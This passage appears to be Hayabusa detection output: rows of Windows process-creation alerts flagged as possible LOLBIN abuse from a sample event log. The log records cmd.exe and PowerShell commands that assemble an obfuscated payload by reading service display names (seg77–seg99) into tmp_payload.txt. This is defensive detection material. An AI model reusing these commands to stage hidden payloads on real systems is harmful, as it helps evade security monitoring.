Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:18.790 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:20.263 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:21.707 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:21.722 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:27.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:27.575 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:31.906 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:31.922 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:37.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:37.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:42.211 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:42.227 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:48.052 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:48.067 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaa0 | User: FS03$ | LID: 